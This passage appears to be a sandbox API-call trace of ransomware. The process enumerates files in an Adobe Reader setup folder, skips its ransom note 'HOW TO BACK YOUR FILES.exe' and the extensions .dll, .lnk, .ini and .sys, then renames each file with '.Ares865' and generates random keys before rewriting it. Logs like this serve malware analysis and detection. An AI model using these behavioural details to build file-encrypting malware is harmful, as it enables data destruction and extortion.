szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.495] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.495] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.495] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.496] CloseHandle (hObject=0x170) returned 1 [0154.496] CloseHandle (hObject=0x118) returned 1 [0154.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.496] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc438b000, ftCreationTime.dwHighDateTime=0x1d0cebb, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xc438b000, ftLastWriteTime.dwHighDateTime=0x1d0cebb, nFileSizeHigh=0x0, nFileSizeLow=0x9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1029.mst", cAlternateFileName="")) returned 1 [0154.496] lstrcmpiW (lpString1="1029.mst", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0154.496] lstrcmpiW (lpString1="1029.mst", lpString2="aoldtz.exe") returned -1 [0154.496] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1029.mst" | out: lpString1="1029.mst") returned="1029.mst" [0154.496] lstrlenW (lpString="1029.mst") returned 8 [0154.496] lstrlenW (lpString="Ares865") returned 7 [0154.496] lstrcmpiW (lpString1="029.mst", lpString2="Ares865") returned -1 [0154.497] lstrlenW (lpString=".dll") returned 4 [0154.497] lstrcmpiW (lpString1="1029.mst", lpString2=".dll") returned 1 [0154.497] lstrlenW (lpString=".lnk") returned 4 [0154.497] lstrcmpiW (lpString1="1029.mst", lpString2=".lnk") returned 1 [0154.497] lstrlenW (lpString=".ini") returned 4 [0154.497] lstrcmpiW (lpString1="1029.mst", lpString2=".ini") returned 1 [0154.497] lstrlenW (lpString=".sys") returned 4 [0154.497] lstrcmpiW (lpString1="1029.mst", lpString2=".sys") returned 1 [0154.497] lstrlenW (lpString="1029.mst") returned 8 [0154.497] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst.Ares865") returned 108 [0154.497] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1029.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1029.mst.ares865"), dwFlags=0x1) returned 1 [0154.499] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1029.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1029.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.499] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=36864) returned 1 [0154.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.499] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.500] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.500] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.500] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.500] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.501] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x9300, lpName=0x0) returned 0x170 [0154.502] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x9300) returned 0x190000 [0154.505] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.505] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.505] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.505] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.505] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.506] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.506] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.506] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.506] CloseHandle (hObject=0x170) returned 1 [0154.506] CloseHandle (hObject=0x118) returned 1 [0154.507] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1030.mst" | out: lpString1="1030.mst") returned="1030.mst" [0154.507] lstrlenW (lpString="1030.mst") returned 8 [0154.507] lstrlenW (lpString="Ares865") returned 7 [0154.507] lstrcmpiW (lpString1="030.mst", lpString2="Ares865") returned -1 [0154.507] lstrlenW (lpString=".dll") returned 4 [0154.507] lstrcmpiW (lpString1="1030.mst", lpString2=".dll") returned 1 [0154.507] lstrlenW (lpString=".lnk") returned 4 [0154.507] lstrcmpiW (lpString1="1030.mst", lpString2=".lnk") returned 1 [0154.507] lstrlenW (lpString=".ini") returned 4 [0154.507] lstrcmpiW (lpString1="1030.mst", lpString2=".ini") returned 1 [0154.507] lstrlenW (lpString=".sys") returned 4 [0154.507] lstrcmpiW (lpString1="1030.mst", lpString2=".sys") returned 1 [0154.507] lstrlenW (lpString="1030.mst") returned 8 [0154.508] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst.Ares865") returned 108 [0154.508] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1030.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1030.mst.ares865"), dwFlags=0x1) returned 1 [0154.510] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1030.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1030.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.510] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46592) returned 1 [0154.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.511] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.511] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.511] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.511] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb900, lpName=0x0) returned 0x170 [0154.520] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb900) returned 0x190000 [0154.523] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.523] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.523] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.525] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1031.mst" | out: lpString1="1031.mst") returned="1031.mst" [0154.525] lstrlenW (lpString="1031.mst") returned 8 [0154.525] lstrlenW (lpString="Ares865") returned 7 [0154.525] lstrcmpiW (lpString1="031.mst", lpString2="Ares865") returned -1 [0154.525] lstrlenW (lpString=".dll") returned 4 [0154.525] lstrcmpiW (lpString1="1031.mst", lpString2=".dll") returned 1 [0154.525] lstrlenW (lpString=".lnk") returned 4 [0154.525] lstrcmpiW (lpString1="1031.mst", lpString2=".lnk") returned 1 [0154.525] lstrlenW (lpString=".ini") returned 4 [0154.526] lstrcmpiW (lpString1="1031.mst", lpString2=".ini") returned 1 [0154.526] lstrlenW (lpString=".sys") returned 4 [0154.526] lstrcmpiW (lpString1="1031.mst", lpString2=".sys") returned 1 [0154.526] lstrlenW (lpString="1031.mst") returned 8 [0154.526] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst.Ares865") returned 108 [0154.526] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1031.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1031.mst.ares865"), dwFlags=0x1) returned 1 [0154.528] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1031.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1031.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.528] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51712) returned 1 [0154.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.529] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.529] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.529] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.529] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.529] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xcd00, lpName=0x0) returned 0x170 [0154.531] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcd00) returned 0x190000 [0154.534] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.534] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.534] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.534] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.536] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1033.mst" | out: lpString1="1033.mst") returned="1033.mst" [0154.536] lstrlenW (lpString="1033.mst") returned 8 [0154.536] lstrlenW (lpString="Ares865") returned 7 [0154.536] lstrcmpiW (lpString1="033.mst", lpString2="Ares865") returned -1 [0154.536] lstrlenW (lpString=".dll") returned 4 [0154.536] lstrcmpiW (lpString1="1033.mst", lpString2=".dll") returned 1 [0154.536] lstrlenW (lpString=".lnk") returned 4 [0154.536] lstrcmpiW (lpString1="1033.mst", lpString2=".lnk") returned 1 [0154.536] lstrlenW (lpString=".ini") returned 4 [0154.536] lstrcmpiW (lpString1="1033.mst", lpString2=".ini") returned 1 [0154.536] lstrlenW (lpString=".sys") returned 4 [0154.536] lstrcmpiW (lpString1="1033.mst", lpString2=".sys") returned 1 [0154.536] lstrlenW (lpString="1033.mst") returned 8 [0154.536] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst.Ares865") returned 108 [0154.536] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1033.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1033.mst.ares865"), dwFlags=0x1) returned 1 [0154.538] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1033.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1033.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.538] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=3584) returned 1 [0154.538] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.539] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.539] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.539] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.539] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.540] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1100, lpName=0x0) returned 0x170 [0154.543] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1100) returned 0x190000 [0154.544] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.545] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.545] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.545] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.546] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1034.mst" | out: lpString1="1034.mst") returned="1034.mst" [0154.546] lstrlenW (lpString="1034.mst") returned 8 [0154.546] lstrlenW (lpString="Ares865") returned 7 [0154.546] lstrcmpiW (lpString1="034.mst", lpString2="Ares865") returned -1 [0154.546] lstrlenW (lpString=".dll") returned 4 [0154.546] lstrcmpiW (lpString1="1034.mst", lpString2=".dll") returned 1 [0154.546] lstrlenW (lpString=".lnk") returned 4 [0154.546] lstrcmpiW (lpString1="1034.mst", lpString2=".lnk") returned 1 [0154.546] lstrlenW (lpString=".ini") returned 4 [0154.546] lstrcmpiW (lpString1="1034.mst", lpString2=".ini") returned 1 [0154.546] lstrlenW (lpString=".sys") returned 4 [0154.546] lstrcmpiW (lpString1="1034.mst", lpString2=".sys") returned 1 [0154.546] lstrlenW (lpString="1034.mst") returned 8 [0154.547] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst.Ares865") returned 108 [0154.547] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1034.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1034.mst.ares865"), dwFlags=0x1) returned 1 [0154.548] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1034.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1034.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.548] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=50176) returned 1 [0154.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.549] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.549] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.549] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.550] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.550] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc700, lpName=0x0) returned 0x170 [0154.551] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc700) returned 0x190000 [0154.554] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.555] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.555] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.555] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.556] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1035.mst" | out: lpString1="1035.mst") returned="1035.mst" [0154.556] lstrlenW (lpString="1035.mst") returned 8 [0154.556] lstrlenW (lpString="Ares865") returned 7 [0154.556] lstrcmpiW (lpString1="035.mst", lpString2="Ares865") returned -1 [0154.556] lstrlenW (lpString=".dll") returned 4 [0154.556] lstrcmpiW (lpString1="1035.mst", lpString2=".dll") returned 1 [0154.556] lstrlenW (lpString=".lnk") returned 4 [0154.556] lstrcmpiW (lpString1="1035.mst", lpString2=".lnk") returned 1 [0154.556] lstrlenW (lpString=".ini") returned 4 [0154.556] lstrcmpiW (lpString1="1035.mst", lpString2=".ini") returned 1 [0154.556] lstrlenW (lpString=".sys") returned 4 [0154.556] lstrcmpiW (lpString1="1035.mst", lpString2=".sys") returned 1 [0154.556] lstrlenW (lpString="1035.mst") returned 8 [0154.557] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst.Ares865") returned 108 [0154.557] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1035.mst"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1035.mst.ares865"), dwFlags=0x1) returned 1 [0154.558] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Setup Files\\{AC76BA86-7AD7-FFFF-7B44-AA0000000001}\\1035.mst.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\setup files\\{ac76ba86-7ad7-ffff-7b44-aa0000000001}\\1035.mst.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.559] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=46592) returned 1 [0154.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.559] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.559] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.560] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.560] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.560] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xb900, lpName=0x0) returned 0x170 [0154.562] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xb900) returned 0x190000 [0154.564] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.565] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.565] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.565] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.567] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="1036.mst" | out: lpString1="1036.mst") returned="1036.mst" 